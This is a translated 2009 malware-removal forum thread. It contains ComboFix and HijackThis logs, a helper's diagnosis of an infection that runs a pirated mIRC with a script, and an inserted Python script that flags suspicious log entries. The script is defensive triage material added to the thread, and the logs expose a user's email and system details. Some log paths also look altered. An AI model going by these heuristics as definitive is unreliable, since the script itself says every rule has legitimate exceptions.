S3 nmwcdnsuc;Nokia USB Flashing Generic;c:\windows\system32\drivers\nmwcdnsuc.sys [2008-06-30 8320]
S3 NPF;NetGroup Packet Filter Driver;c:\windows\system32\drivers\npf.sys [2007-11-06 34064]
S3 VX6000;Microsoft LifeCam VX-6000;c:\windows\system32\drivers\VX6000Xp.sys [2008-07-03 2383152]

--- Autres Services/Pilotes en mémoire ---

*Deregistered* - mchInjDrv
.
Contenu du dossier 'Tâches planifiées'

2009-03-04 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 11:34]
.
.
------- Examen supplémentaire -------
.
uStart Page = hxxp://google.mini20.com
IE: E&xporter vers Microsoft Excel - c:\progra~1\MICROS~4\Office12\EXCEL.EXE/3000
TCP: {8F84AFEF-B3CB-49E5-9B29-54622F44CD90} = 192.168.1.1
FF - ProfilePath - c:\documents and settings\lml-mike\Application Data\Mozilla\Firefox\Profiles\ihggds8b.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.google.com/ig?referrer=ign_n
FF - component: c:\logs\Mozilla Firefox\extensions\{B13721C7-F507-4982-B2E5-502A71474FED}\components\NPComponent.dll
FF - plugin: c:\logs\Adobe\Reader 9.0\Reader\browser\nppdf32.dll
FF - plugin: c:\logs\DivX\DivX Player\npDivxPlayerPlugin.dll
FF - plugin: c:\logs\DivX\DivX Web Player\npdivx32.dll
FF - plugin: c:\logs\QuickTime Alternative\Plugins\npqtplugin.dll
FF - plugin: c:\logs\QuickTime Alternative\Plugins\npqtplugin2.dll
FF - plugin: c:\logs\QuickTime Alternative\Plugins\npqtplugin3.dll
FF - plugin: c:\logs\QuickTime Alternative\Plugins\npqtplugin4.dll
FF - plugin: c:\logs\QuickTime Alternative\Plugins\npqtplugin5.dll
FF - plugin: c:\logs\Real Alternative\browser\plugins\nppl3260.dll
FF - plugin: c:\logs\Real Alternative\browser\plugins\nprpjplug.dll
FF - plugin: c:\logs\VLC\npvlc.dll
.

**************************************************************************

catchme 0.3.1367 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-03-17 14:41:23
Windows 5.1.2600 Service Pack 3 NTFS

Recherche de processus cachés ... 

Recherche d'éléments en démarrage automatique cachés ... 

Recherche de fichiers cachés ... 

Scan terminé avec succès
Fichiers cachés: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\mchInjDrv]
"ImagePath"="\??\c:\docume~1\lml-mike\LOCALS~1\Temp\mc21.tmp"
.
--------------------- CLES DE REGISTRE BLOQUEES ---------------------

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\SecuROM\!CAUTION! NEVER A OR CHANGE ANY KEY*]
"??"=hex:06,95,b7,b5,2c,db,43,08,c0,c4,40,b7,3a,f0,2a,05,8b,2b,28,6f,c9,ca,76,
   7f,e1,71,b4,1f,16,eb,7e,72,d6,61,d1,ab,bf,32,ad,76,1d,c1,da,b1,0b,db,e2,4f,\
"??"=hex:35,fc,c6,3d,c9,02,ad,db,37,1f,61,de,0f,33,8f,50

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\SecuROM\License information*]
"datasecu"=hex:8d,b2,d3,fc,fb,ba,8b,ef,bc,39,76,bb,56,dd,bb,09,4a,9b,37,b4,76,
   41,4a,1a,f2,4d,98,46,c3,d3,79,8f,97,73,ff,5f,66,23,23,07,66,ed,b4,c9,f3,b7,\
"rkeysecu"=hex:77,48,76,f9,7c,3c,d5,71,96,a9,9c,32,51,bb,d8,63
.
Heure de fin: 2009-03-17 14:42:29
ComboFix-quarantined-files.txt  2009-03-17 13:42:27

Avant-CF: 2 880 667 648 octets libres
Après-CF: 3,629,477,888 octets libres

WindowsXP-KB310994-SP2-Pro-BootDisk-FRA.exe
[boot loader]
timeout=2
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professionnel" /noexecute=optin /fastdetect

278	--- E O F ---	2009-03-17 02:04:45
0
Lyonnais92 (25708 posts, Security Contributor) 1 537
 
Re,

the Threatexpert report is very enlightening:

https://www.symantec.com?md5=fbce76a95b969bd1c1c8bd2eb7013df8

(this form is more readable than the copy).

The malware installs a pirated copy of a well-known IRC client, mIRC (the software is paid, cheap but paid; I use it myself), and runs it automatically with the script you provided.

That is probably the malicious file.

Once the cleanup is finished, I advise you to change all your passwords and keep a close eye on your account.

=====================

do this:

Download from here:

http://images.malwareremoval.com/random/RSIT.exe

random's system information tool (RSIT) by random/random and save it to the Desktop.

Double-click RSIT.exe to launch RSIT.

Read the Disclaimer screen, then click Continue (if you accept the terms).

If the HijackThis tool (up-to-date version) is not present or not detected on the computer, RSIT will download it (allow access in your firewall if prompted) and you will have to accept the license.

When the analysis is finished, two text files will open.

Post the contents of info.txt (<<which will be minimized in the Taskbar).

NB: the reports are saved in the C:\rsit folder
0
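The signs Lyonnais92 is pointing at (a known program dropped in an odd folder under C:\WINDOWS, a non-empty AppInit_DLLs, a driver image living in a Temp folder) can be checked mechanically from pasted report lines. This is an added example, not a tool from this thread; the rule names, the WINDIR_OK list and the sample lines (copied from the logs posted above) are my own choices.

```python
import re
from collections import defaultdict

# Constructed sample: lines copied from the HijackThis and ComboFix reports
# posted in this thread. The script only reads text; it never touches the
# registry or the file system.
SAMPLE_LOG = r"""
O4 - HKLM\..\Run: [AVG8_TRAY] C:\logs\avg\avgtray.exe
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O20 - AppInit_DLLs: antbve.dll
O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll
"C:\Logs\mIRC\mirc.exe"="C:\Logs\mIRC\mirc.exe:*:Enabled:mIRC"
"C:\WINDOWS\Winend\mirc.exe"="C:\WINDOWS\Winend\mirc.exe:*:Disabled:mIRC"
"ImagePath"="\??\c:\docume~1\lml-mike\LOCALS~1\Temp\mc21.tmp"
"""

# A Windows path ending in a binary-type extension. ':' is excluded from the
# body so the match stops before the firewall rule's ":*:Enabled:" suffix.
PATH_RE = re.compile(r'[A-Za-z]:\\[^"*<>|?:]+?\.(?:exe|dll|sys|tmp)\b', re.IGNORECASE)
APPINIT_RE = re.compile(r'^O20 - AppInit_DLLs:\s*(\S.*)$')

# Subdirectories of the Windows directory that legitimately hold executables
# (assumed baseline; extend it for your own machine).
WINDIR_OK = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\windows\\network diagnostic\\",
)


def triage(log_text):
    """Return (rule, evidence) findings for pasted HijackThis/ComboFix lines.

    Rules (defender heuristics of my own, not from the thread):
      appinit_dlls          AppInit_DLLs is non-empty: that DLL is loaded into
                            every process that loads user32.dll.
      exe_in_windir_subdir  an .exe in a non-standard subfolder of C:\\WINDOWS.
      temp_image            a service/driver image inside a Temp folder or .tmp.
      duplicate_binary      the same file name seen in two different folders.
    """
    findings = []
    dirs_by_name = defaultdict(set)
    for line in log_text.splitlines():
        m = APPINIT_RE.match(line.strip())
        if m:
            findings.append(("appinit_dlls", m.group(1).strip()))
            continue
        for path in sorted(set(PATH_RE.findall(line))):
            low = path.lower()
            directory, name = low.rsplit("\\", 1)
            dirs_by_name[name].add(directory + "\\")
            if (name.endswith(".exe") and low.startswith("c:\\windows\\")
                    and low.count("\\") > 2 and not low.startswith(WINDIR_OK)):
                findings.append(("exe_in_windir_subdir", path))
            if "\\temp\\" in low or name.endswith(".tmp"):
                findings.append(("temp_image", path))
    # A second copy of a binary in another folder (here mirc.exe under
    # C:\WINDOWS\Winend next to the real install in C:\Logs\mIRC) is a
    # classic sign of a legitimate program being repurposed.
    for name, dirs in sorted(dirs_by_name.items()):
        if len(dirs) > 1:
            findings.append(("duplicate_binary", name + " in " + ", ".join(sorted(dirs))))
    return findings


if __name__ == "__main__":
    for rule, evidence in triage(SAMPLE_LOG):
        print(f"{rule:22} {evidence}")
```

The hits are only leads for the helper to verify against the full report, not a verdict; every rule has legitimate exceptions.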
lml-mike (487 posts, Contributor) 122
 
Thanks again!!!

Here is the report:

Logfile of random's system information tool 1.05 (written by random/random)
Run by lml-mike at 2009-03-17 16:05:34
Microsoft Windows XP Professionnel Service Pack 3
System drive C: has 3 GB (17%) free of 20 GB
Total RAM: 3007 MB (66% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 16:05:39, on 17/03/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Fichiers communs\Autodesk Shared\Service\AdskScSrv.exe
C:\Logs\Diskeeper\DkService.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Fichiers communs\LightScribe\LSSrvc.exe
V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe
C:\Program Files\Microsoft LifeCam\MSCamSvc.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\Logs\Winamp\winampa.exe
C:\Logs\DU Meter\DUMeter.exe
C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe
C:\Logs\Winamp Remote\bin\OrbTray.exe
C:\Logs\SuperCopier2\SuperCopier2.exe
C:\Logs\Nokia\Nokia PC Suite 7\PCSuite.exe
C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexStoreSvr.exe
C:\Logs\Winamp Remote\bin\Orb.exe
C:\WINDOWS\system32\wbem\wmiapsrv.exe
C:\WINDOWS\System32\alg.exe
C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexingService.exe
C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
C:\Program Files\PC Connectivity Solution\Transports\NclUSBSrv.exe
C:\Program Files\PC Connectivity Solution\Transports\NclRSSrv.exe
C:\WINDOWS\System32\svchost.exe
C:\Logs\mIRC\mirc.exe
C:\logs\avg\avgwdsvc.exe
C:\logs\avg\avgam.exe
C:\logs\avg\avgrsx.exe
C:\WINDOWS\explorer.exe
C:\Logs\Mozilla Firefox\firefox.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Windows Live\Contacts\wlcomm.exe
C:\Logs\Mumble2\bin\dbus-daemon.exe
V:\Steam\steam.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Documents and Settings\lml-mike\Bureau\RSIT.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\trend micro\lml-mike.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www1.mini20.com/?tm=1&kw=Secure+Web+Search+Engine&KW1=Secure%20Web%20Search%20Engine&KW2=Best%20Malware%20Detection%20And%20Removal%20Software&searchbox=0&domainname=0&backfill=0
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.msn.com/fr-fr/?ocid=iehp
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.msn.com/fr-fr/?ocid=iehp
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
O2 - BHO: G DATA WebFilter Class - {0124123D-61B4-456f-AF86-78C53A0790C5} - (no file)
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: (no name) - {0124123D-61B4-456f-AF86-78C53A0790C5} - (no file)
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [WinampAgent] C:\Logs\Winamp\winampa.exe
O4 - HKLM\..\Run: [DU Meter] C:\Logs\DU Meter\DUMeter.exe
O4 - HKLM\..\Run: [DiskeeperSystray] "C:\Logs\Diskeeper\DkIcon.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Fichiers communs\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [LifeCam] "C:\Program Files\Microsoft LifeCam\LifeExp.exe"
O4 - HKLM\..\Run: [VX6000] C:\WINDOWS\vVX6000.exe
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Logs\QuickTime Alternative\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [AVG8_TRAY] C:\logs\avg\avgtray.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [Orb] "C:\Logs\Winamp Remote\bin\OrbTray.exe" /background
O4 - HKCU\..\Run: [SuperCopier2.exe] C:\Logs\SuperCopier2\SuperCopier2.exe
O4 - HKCU\..\Run: [PC Suite Tray] "C:\Logs\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~4\Office12\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre6\bin\jp2iexp.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre6\bin\jp2iexp.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~4\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/...
O17 - HKLM\System\CCS\Services\Tcpip\..\{8F84AFEF-B3CB-49E5-9B29-54622F44CD90}: NameServer = 192.168.1.1
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\FICHIE~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: antbve.dll
O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Fichiers communs\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\logs\avg\avgwdsvc.exe
O23 - Service: Diskeeper - Executive Software International, Inc. - C:\Logs\Diskeeper\DkService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Fichiers communs\LightScribe\LSSrvc.exe
O23 - Service: RaySat_3dsmax8 Server (mi-raysat_3dsmax8) - Unknown owner - V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexingService.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies - C:\Program Files\WinPcap\rpcapd.exe
O23 - Service: ServiceLayer - Nokia. - C:\Program Files\PC Connectivity Solution\ServiceLayer.exe

--
End of file - 8731 bytes

======Scheduled tasks folder======

C:\WINDOWS\tasks\AppleSoftwareUpdate.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0124123D-61B4-456f-AF86-78C53A0790C5}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
SSVHelper Class - C:\Program Files\Java\jre6\bin\ssv.dll [2008-11-10 320920]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
Programme d'aide de l'Assistant de connexion Windows Live - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-01-22 408448]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2008-11-10 34816]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2008-11-10 73728]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{0124123D-61B4-456f-AF86-78C53A0790C5}

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"=C:\Program Files\Analog Devices\Core\smax4pnp.exe [2006-12-18 868352]
"NvCplDaemon"=C:\WINDOWS\system32\NvCpl.dll [2008-10-07 13574144]
"nwiz"=nwiz.exe /install []
"WinampAgent"=C:\Logs\Winamp\winampa.exe [2008-04-01 36352]
"DU Meter"=C:\Logs\DU Meter\DUMeter.exe [2003-06-22 1303552]
"DiskeeperSystray"=C:\Logs\Diskeeper\DkIcon.exe [2004-10-04 176216]
"NeroFilterCheck"=C:\Program Files\Fichiers communs\Ahead\Lib\NeroCheck.exe [2006-01-12 155648]
"LifeCam"=C:\Program Files\Microsoft LifeCam\LifeExp.exe [2006-06-30 269104]
"VX6000"=C:\WINDOWS\vVX6000.exe [2006-06-30 994096]
"HPDJ Taskbar Utility"=C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe [2003-03-09 188416]
"NvMediaCenter"=C:\WINDOWS\system32\NvMcTray.dll [2008-10-07 86016]
"SunJavaUpdateSched"=C:\Program Files\Java\jre6\bin\jusched.exe [2008-11-10 136600]
"QuickTime Task"=C:\Logs\QuickTime Alternative\QTTask.exe [2009-01-05 413696]
"AVG8_TRAY"=C:\logs\avg\avgtray.exe [2009-03-17 1932568]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"=C:\WINDOWS\system32\ctfmon.exe [2008-04-13 15360]
"msnmsgr"=C:\Program Files\Windows Live\Messenger\msnmsgr.exe [2009-02-06 3885408]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"=C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe [2006-12-23 143360]
"Orb"=C:\Logs\Winamp Remote\bin\OrbTray.exe [2008-04-01 507904]
"SuperCopier2.exe"=C:\Logs\SuperCopier2\SuperCopier2.exe [2006-07-07 1052672]
"PC Suite Tray"=C:\Logs\Nokia\Nokia PC Suite 7\PCSuite.exe [2008-12-03 1205760]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLS"="antbve.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\avgrsstarter]
C:\WINDOWS\system32\avgrsstx.dll [2009-03-17 10520]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WgaLogon]
C:\WINDOWS\system32\WgaLogon.dll [2008-09-05 267304]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll [2006-10-18 133632]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\nm]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\nm.sys]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=323
"NoDriveAutoRun"=67108863
"NoDrives"=0

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"HonorAutoRunSetting"=
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=
"NoDrives"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"V:\Steam\SteamApps\lml_mike@hotmail.com\counter-strike source\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\counter-strike source\hl2.exe:*:Enabled:hl2"
"C:\Logs\HLSW\hlsw.exe"="C:\Logs\HLSW\hlsw.exe:*:Enabled:HLSW Application"
"C:\Logs\ABC\abc.exe"="C:\Logs\ABC\abc.exe:*:Enabled:abc"
"V:\Steam\steam.exe"="V:\Steam\steam.exe:*:Enabled:Steam"
"C:\Program Files\Fichiers communs\Nokia\Service Layer\A\nsl_host_process.exe"="C:\Program Files\Fichiers communs\Nokia\Service Layer\A\nsl_host_process.exe:*:Enabled:Nokia Service Layer Host Process "
"C:\Program Files\Nokia\Nokia Software Updater\nsu_ui_client.exe"="C:\Program Files\Nokia\Nokia Software Updater\nsu_ui_client.exe:*:Enabled:Nokia Software Updater"
"C:\WINDOWS\system32\mmc.exe"="C:\WINDOWS\system32\mmc.exe:*:Enabled:Microsoft Management Console"
"V:\eMule\emule.exe"="V:\eMule\emule.exe:*:Enabled:eMule"
"C:\Program Files\Microsoft LifeCam\LifeCam.exe"="C:\Program Files\Microsoft LifeCam\LifeCam.exe:*:Enabled:LifeCam.exe"
"C:\Program Files\Microsoft LifeCam\LifeExp.exe"="C:\Program Files\Microsoft LifeCam\LifeExp.exe:*:Enabled:LifeExp.exe"
"V:\Quake III Arena\quake3.exe"="V:\Quake III Arena\quake3.exe:*:Enabled:quake3"
"C:\Logs\Mozilla Firefox\firefox.exe"="C:\Logs\Mozilla Firefox\firefox.exe:*:Enabled:Firefox"
"C:\Logs\FlashFXP\flashfxp.exe"="C:\Logs\FlashFXP\flashfxp.exe:*:Enabled:FlashFXP"
"C:\Logs\Winamp Remote\bin\Orb.exe"="C:\Logs\Winamp Remote\bin\Orb.exe:*:Enabled:Orb"
"C:\Logs\Winamp Remote\bin\OrbTray.exe"="C:\Logs\Winamp Remote\bin\OrbTray.exe:*:Enabled:OrbTray"
"C:\Logs\Winamp Remote\bin\OrbStreamerClient.exe"="C:\Logs\Winamp Remote\bin\OrbStreamerClient.exe:*:Enabled:Orb Stream Client"
"V:\Logs\backburner\monitor.exe"="V:\Logs\backburner\monitor.exe:*:Enabled:backburner 2.3 monitor"
"V:\Logs\backburner\manager.exe"="V:\Logs\backburner\manager.exe:*:Enabled:backburner 2.3 manager"
"V:\Logs\backburner\server.exe"="V:\Logs\backburner\server.exe:*:Enabled:backburner 2.3 server"
"V:\Steam\SteamApps\lml_mike@hotmail.com\half-life 2 deathmatch\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\half-life 2 deathmatch\hl2.exe:*:Enabled:hl2"
"C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE"="C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook"
"V:\Steam\SteamApps\lml_mike@hotmail.com\synergy\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\synergy\hl2.exe:*:Enabled:hl2"
"V:\Steam\SteamApps\lml_mike@hotmail.com\zombie panic! source\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\zombie panic! source\hl2.exe:*:Enabled:hl2"
"C:\Logs\mIRC\mirc.exe"="C:\Logs\mIRC\mirc.exe:*:Enabled:mIRC"
"C:\Program Files\Java\jre6\bin\java.exe"="C:\Program Files\Java\jre6\bin\java.exe:*:Enabled:Java(TM) Platform SE binary"
"C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files\Kaspersky Internet Security 2009\English\setup.exe"="C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files\Kaspersky Internet Security 2009\English\setup.exe:*:Enabled:Kaspersky Internet Security 2009 Setup"
"V:\Shaun White Snowboarding\ShaunWhiteSnowboardingGame.exe"="V:\Shaun White Snowboarding\ShaunWhiteSnowboardingGame.exe:*:Enabled:Shaun White Snowboarding Game"
"V:\Shaun White Snowboarding\ShaunWhiteSnowboarding.exe"="V:\Shaun White Snowboarding\ShaunWhiteSnowboarding.exe:*:Enabled:Shaun White Snowboarding Update"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\Logs\avg\avgam.exe"="C:\Logs\avg\avgam.exe:*:Enabled:avgam.exe"
"C:\Logs\avg\avgupd.exe"="C:\Logs\avg\avgupd.exe:*:Enabled:avgupd.exe"
